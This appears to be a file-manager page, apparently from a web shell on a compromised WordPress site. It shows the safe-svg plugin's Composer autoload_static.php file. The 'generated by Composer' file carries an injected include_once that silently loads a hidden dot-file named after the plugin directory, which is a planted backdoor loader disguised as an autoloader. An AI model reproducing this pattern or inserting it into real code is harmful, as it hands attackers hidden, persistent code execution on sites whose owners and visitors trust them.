/
var
/
www
/
barefootlaw.org
/
wp-content
/
plugins
/
safe-svg
/
lib
/
vendor
/
composer
/
Upload File
HOME
<?php // autoload_static.php @generated by Composer namespace Composer\Autoload; if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class ComposerStaticInit0917edb609b9527c9322825d39f92c1b { public static $prefixLengthsPsr4 = array ( 'e' => array ( 'enshrined\\svgSanitize\\' => 22, ), ); public static $prefixDirsPsr4 = array ( 'enshrined\\svgSanitize\\' => array ( 0 => __DIR__ . '/..' . '/enshrined/svg-sanitize/src', ), ); public static function getInitializer(ClassLoader $loader) { return \Closure::bind(function () use ($loader) { $loader->prefixLengthsPsr4 = ComposerStaticInit0917edb609b9527c9322825d39f92c1b::$prefixLengthsPsr4; $loader->prefixDirsPsr4 = ComposerStaticInit0917edb609b9527c9322825d39f92c1b::$prefixDirsPsr4; }, null, ClassLoader::class); } }